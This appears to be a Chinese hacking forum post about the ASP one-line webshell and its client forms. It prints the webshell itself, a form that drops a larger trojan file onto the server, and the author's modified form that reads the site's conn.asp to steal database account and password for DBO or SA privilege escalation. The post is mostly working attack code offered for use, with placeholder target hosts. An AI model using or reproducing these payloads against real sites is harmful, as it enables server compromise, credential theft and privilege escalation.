一句话木马的常用做法是利用数据库备份生成一个 asp文件，然后利用连接端再生成一个大马。

但是！很多大马都遭到杀软的通缉，写进去很多不是被杀就是被封！

看了一句话木马的原理，其实非常简单，我突发奇想，按理说也应该可以读取到sql的连接信息，如果我已经知道了conn.asp的位置的话（可以通过注入扫描工具 啊D 明小子之类的），如果读取了这个连接信息的文件conn.asp,把帐号密码读出来，那可以通过DBO提权，如果是SA的话那就更爽了。。。

于是我就自己试着改造（主要是客户端的改变）这个木马

－－－－－－－－－

一句话木马内容如下，这个没什么好说的，也没什么好改的：

<%execute request("value")%>

－－－－－－－蓝屏大叔的连接端源码如下－－－－－－－－－－－－－－－－


<form action=http://www.xxx.com/a.asp method=post>
<textarea name=value cols=120 rows=10 width=45>
set lP=server.createObject("Adodb.Stream")
lP.Open
lP.Type=2
lP.CharSet="gb2312"
lP.writetext request("fhod")
lP.SaveToFile server.mappath("ck.asp"),2
lP.Close
set lP=nothing
response.redirect "ck.asp"
</textarea>
<textarea name=fhod cols=120 rows=10 width=45>添入生成木马的内容</textarea><BR><center><br>
<input type=submit value=提交>
</form>


－－－－－－－－－－－－－－－－－------------------------------------




我改造的连接端如下：

<form action=http://www.xxxx.com/a.asp method=post>
<textarea name=value cols=120 rows=10 width=45>
dim fso
Set FSO = Server.CreateObject("Scripting.FileSystemObject")
  File = Server.MapPath("../public/conn.asp")

n=0
If FSO.FileExists(File) = True Then '判断该文件是否存在


Set CTF=FSO.OpenTextFile(File,1,False,TristateFalse)
do while not(ctf.AtEndOfStream)
response.write "<br>-------"
response.write CTF.ReadLine
response.write "<br>------"
loop
End If
set ctf=nothing
set fso=nothing
</textarea>
<textarea name=fhod cols=120 rows=10 width=45>添入生成木马的内容</textarea><BR><center><br>
<input type=submit value=提交>
</form>




----------------非常简单吧，嘿嘿，只是利用 FSO读取文本出来－－－－－－－－－－－－



注意两点：

1。要sql中文版 ，其他版读出来的是乱码！

2。要知道连接信息文件的相对路径

－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－

测试环境是 sql 2000 中文版 sp4


其他版本读出来的是乱码，目前原因估计可能是字符集的显示问题。。。。

如果大家有好的方法解决这个问题也可以一起测验一下哦